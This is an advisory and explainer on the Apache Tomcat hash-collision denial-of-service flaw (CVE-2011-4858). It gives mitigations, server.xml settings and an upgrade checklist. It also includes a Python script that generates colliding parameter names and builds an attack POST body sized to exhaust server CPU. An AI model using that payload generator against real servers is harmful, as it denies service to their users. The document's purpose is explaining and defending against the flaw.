Cause:
On Wed, 28 Dec 2011 22:28:16 GMT the Apache Tomcat team published a security announcement for a hash collision denial-of-service vulnerability (CVE-2011-4858):
Http://mail-archives.apache.org/mod_mbox/www-announce/201112.mbox/%3C4EFB9800.5010106@apache.org%3E
Vulnerability principle:
Most web containers store a request's parameters in the language's standard hash table (in Java, HashMap/Hashtable). When different keys hash to the same value, they are chained together in the same bucket as a linked list. This scheme, separate chaining (the "zipper method" in the original text), is one of the standard ways of resolving hash collisions, and it is how the JDK's HashMap/Hashtable are implemented. Chaining costs a little extra space, because every entry carries a pointer to the next node, and a little extra time on every probe, because a lookup has to walk the chain comparing keys one by one instead of indexing directly to the element. When a large number of keys share the same hash value the chain becomes very long, and every get() or put() of a key in that bucket must compare it against the entries along the chain until a match is found (or the end is reached).
The vulnerability is therefore a request whose parameter names are all chosen to collide on the same hash value. Java's String.hashCode() is deterministic and well known, so such names are easy to compute in bulk. The container's parameter map degenerates into one long chain: inserting n colliding names costs on the order of n^2/2 string comparisons, so parsing the parameters of a single request of a few hundred kilobytes, normally a cheap operation, becomes a very CPU-intensive one, and a handful of such requests is enough to keep the server's CPUs busy.
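As an added example (not code from the original page or from the Tomcat project), the following Python script shows the mechanism end to end: it reimplements Java's String.hashCode(), generates parameter names that all share one hash value, counts key comparisons in a toy separate-chaining table of the kind described above, and builds the form body an attacker would POST. The function and class names (java_string_hash, colliding_keys, ChainedTable, attack_body) are my own.

```python
import itertools

MASK32 = 0xFFFFFFFF


def java_string_hash(s: str) -> int:
    """Java's String.hashCode(): h = 31*h + c over the UTF-16 code units, with
    32-bit signed wraparound. This is the hash HashMap/Hashtable use for String keys."""
    h = 0
    for ch in s:
        h = (31 * h + ord(ch)) & MASK32
    return h - (1 << 32) if h & 0x80000000 else h


# "Aa" and "BB" both hash to 31*65+97 == 31*66+66 == 2112. Because the hash of a
# concatenation is h(left)*31**len(right) + h(right), every string built from k of
# these two-character blocks has the same hash as every other such string, which
# gives 2**k distinct parameter names that all land in one bucket.
COLLIDING_BLOCKS = ("Aa", "BB")


def colliding_keys(n_blocks: int):
    """Yield 2**n_blocks distinct strings with identical String.hashCode()."""
    for combo in itertools.product(COLLIDING_BLOCKS, repeat=n_blocks):
        yield "".join(combo)


class ChainedTable:
    """Toy separate-chaining hash table in the style the text describes, with a
    counter for key comparisons so the cost of colliding inserts can be measured.
    (JDK HashMap also spreads the hash bits before choosing a bucket, but identical
    hashes still share one bucket, so the chain behaviour is the same.)"""

    def __init__(self, n_buckets: int = 1024):
        self.buckets = [[] for _ in range(n_buckets)]
        self.compares = 0

    def _chain(self, key: str) -> list:
        # Python's % is non-negative even for Java's negative hash values.
        return self.buckets[java_string_hash(key) % len(self.buckets)]

    def put(self, key: str, value) -> None:
        chain = self._chain(key)
        for entry in chain:            # walk the chain looking for an existing key
            self.compares += 1
            if entry[0] == key:
                entry[1] = value
                return
        chain.append([key, value])     # not found: append a new node

    def get(self, key: str):
        for entry in self._chain(key):
            self.compares += 1
            if entry[0] == key:
                return entry[1]
        return None


def insert_cost(keys) -> int:
    """Number of key comparisons needed to insert all keys into an empty table."""
    table = ChainedTable()
    for k in keys:
        table.put(k, "x")
    return table.compares


def attack_body(n_blocks: int) -> tuple[str, int, int]:
    """Build an application/x-www-form-urlencoded body of colliding parameter names.
    Returns (body, body_size_bytes, worst_case_compares): inserting n colliding keys
    costs n*(n-1)/2 comparisons, i.e. quadratic in the number of parameters."""
    keys = list(colliding_keys(n_blocks))
    body = "&".join(k + "=1" for k in keys)
    n = len(keys)
    return body, len(body), n * (n - 1) // 2


if __name__ == "__main__":
    # 16 colliding keys vs. 16 ordinary keys: 120 comparisons vs. 0.
    print("colliding:", insert_cost(colliding_keys(4)))
    print("ordinary :", insert_cost(f"k{i}" for i in range(16)))
    # 2**15 names of 30 characters each fit under the 2 MB default maxPostSize.
    _, size, cost = attack_body(15)
    print(f"2**15 params: {size} bytes, about {cost:,} string comparisons to parse")
```

Note what the numbers say about the mitigations below: 2^15 colliding names fit in about 1.08 MB, comfortably under the 2 MB default maxPostSize, and cost roughly 5.4 x 10^8 comparisons to insert; cutting maxPostSize to under 10 KB leaves room for only a few hundred names, and a cap of 10000 parameters bounds the worst case at 10000 x 9999 / 2, about 5 x 10^7 comparisons per request.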
Affected Versions:
Apache Tomcat 5.x
Apache Tomcat 6.x
Apache Tomcat 7.x
Solution:
Tomcat temporary mitigation:
The Connector attribute maxPostSize (configured on the Connector element of server.xml) limits the size of POST body that Tomcat will parse for parameters. The default is 2097152 bytes (2 MB); 0 disables the limit, and 20971520 would be 20 MB. As a stopgap on an unpatched server, lower it to a value under 10 KB so that an attacker cannot fit enough colliding parameter names into one request. This works on all affected versions, but it also affects legitimate users, because form data larger than the limit will no longer be parsed. Note that it only covers the POST body; parameters sent in the query string are bounded by maxHttpHeaderSize (8 KB by default) instead.
Permanent Tomcat solution:
Upgrade Apache Tomcat to version 5.5.35, 6.0.35, 7.0.23, or later.
These versions add the Connector attribute maxParameterCount (configured on the Connector element of server.xml), which caps the number of parameters, query string plus POST body, that Tomcat will parse for a single request; if it is not configured it defaults to 10000. Parameters beyond the limit are ignored, so the amount of work an attacker can force per request is bounded.
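As an added example (not from the original page or from the Tomcat project), the two settings above on a server.xml Connector. The port numbers and the specific values chosen are assumptions; the page itself only specifies "under 10 K" for the stopgap and the 10000 default for maxParameterCount.

```xml
<!-- Before: default settings, no parameter cap. The 2 MB default maxPostSize
     still leaves room for tens of thousands of colliding parameter names. -->
<Connector port="8080" protocol="HTTP/1.1"
           connectionTimeout="20000"
           redirectPort="8443" />

<!-- Stopgap on an unpatched 5.x/6.x/7.x server: cap the POST body well below
     the default (8 KB here, assumed value). Larger form posts will not be parsed. -->
<Connector port="8080" protocol="HTTP/1.1"
           connectionTimeout="20000"
           redirectPort="8443"
           maxPostSize="8192" />

<!-- After upgrading to 5.5.35 / 6.0.35 / 7.0.23 or later: restore the normal body
     limit and set maxParameterCount explicitly (1000 here, assumed; the default is
     10000 if the attribute is omitted). -->
<Connector port="8080" protocol="HTTP/1.1"
           connectionTimeout="20000"
           redirectPort="8443"
           maxPostSize="2097152"
           maxParameterCount="1000" />
```

Pick the maxParameterCount value from the largest form your applications actually submit; the default of 10000 is generous and a lower value shrinks the worst-case work per request further.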
When the "Apache Tomcat Web form hash collision Denial of Service Vulnerability" has been detected on a production server, the upgrade needs to be planned as a whole rather than done by swapping binaries in place. Notes for upgrading a production server:
1. Back up the existing Tomcat installation.
2. Compare server.xml and context.xml with the new version's copies and carry your settings over into the new server's files.
3. Look through the old container's lib directory and copy any jar files you added yourself (JDBC drivers and the like) into the new server.
4. Compare catalina.sh with the new version's copy. In particular, you may have set the JVM memory parameters there, for example
JAVA_OPTS="$JAVA_OPTS -server -Xms1024m -Xmx2048m -XX:PermSize=256m -XX:MaxNewSize=512m -XX:MaxPermSize=256m"
and that line has to be carried over to the new server.
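As an added example (not from the original page or from the Tomcat project), a small Python pre-upgrade check that automates steps 2 to 4: it lists the jars in the old lib/ that the new distribution does not ship, and for server.xml, context.xml and catalina.sh it extracts the lines present only in the old copy, which are the local customisations that must be re-applied. The function names and the sample directory layout it builds are my own; the two installs it creates are constructed sample data, not real Tomcat files.

```python
import difflib
import tempfile
from pathlib import Path

# Files the upgrade notes say to compare between the old and new server.
CONFIG_FILES = ("conf/server.xml", "conf/context.xml", "bin/catalina.sh")


def user_added_jars(old_home: str, new_home: str) -> list[str]:
    """Jars in the old lib/ that the new distribution does not ship (JDBC drivers,
    logging bridges, ...): the files step 3 says to copy across."""
    old_jars = {p.name for p in Path(old_home, "lib").glob("*.jar")}
    new_jars = {p.name for p in Path(new_home, "lib").glob("*.jar")}
    return sorted(old_jars - new_jars)


def config_diff(old_home: str, new_home: str, rel_path: str) -> list[str]:
    """Unified diff of one config file between the two installs (empty if identical)."""
    old = Path(old_home, rel_path).read_text().splitlines()
    new = Path(new_home, rel_path).read_text().splitlines()
    return list(difflib.unified_diff(old, new, fromfile="old/" + rel_path,
                                     tofile="new/" + rel_path, lineterm=""))


def settings_to_carry(diff: list[str]) -> list[str]:
    """Lines present only in the old file: local customisations that must be
    re-applied to the new server's copy (steps 2 and 4). The '---' file header
    of the unified diff is skipped."""
    return [line[1:] for line in diff
            if line.startswith("-") and not line.startswith("---")]


def upgrade_checklist(old_home: str, new_home: str) -> dict:
    """Everything that has to move from the old install to the new one."""
    report = {"jars_to_copy": user_added_jars(old_home, new_home),
              "settings_to_carry": {}}
    for rel in CONFIG_FILES:
        if Path(old_home, rel).is_file() and Path(new_home, rel).is_file():
            report["settings_to_carry"][rel] = settings_to_carry(
                config_diff(old_home, new_home, rel))
    return report


def build_sample_installs() -> tuple[str, str]:
    """Constructed sample data: two throwaway directory trees shaped like a Tomcat
    install (not real Tomcat files), so the checklist can be run offline."""
    base = Path(tempfile.mkdtemp(prefix="tomcat-upgrade-"))
    old, new = base / "apache-tomcat-6.0.32", base / "apache-tomcat-6.0.35"
    for home in (old, new):
        for sub in ("lib", "conf", "bin"):
            (home / sub).mkdir(parents=True)
        (home / "lib" / "catalina.jar").write_text("")   # shipped by both versions
        (home / "conf" / "context.xml").write_text("<Context>\n</Context>\n")
    # Old server: an admin-added JDBC driver, a tightened maxPostSize, custom heap flags.
    (old / "lib" / "my-jdbc-driver.jar").write_text("")
    (old / "conf" / "server.xml").write_text(
        '<Connector port="8080" protocol="HTTP/1.1" maxPostSize="8192" />\n')
    (old / "bin" / "catalina.sh").write_text(
        '#!/bin/sh\nJAVA_OPTS="$JAVA_OPTS -server -Xms1024m -Xmx2048m"\nexec java $JAVA_OPTS\n')
    # New server: pristine distribution files.
    (new / "conf" / "server.xml").write_text(
        '<Connector port="8080" protocol="HTTP/1.1" />\n')
    (new / "bin" / "catalina.sh").write_text('#!/bin/sh\nexec java $JAVA_OPTS\n')
    return str(old), str(new)


if __name__ == "__main__":
    old_home, new_home = build_sample_installs()
    for key, value in upgrade_checklist(old_home, new_home).items():
        print(key, value)
```

Run it against the real old and new CATALINA_HOME directories instead of the sample layout; the reported lines are the ones to merge by hand into the new server's copies, after which the old tree can be retired once the backup from step 1 is confirmed.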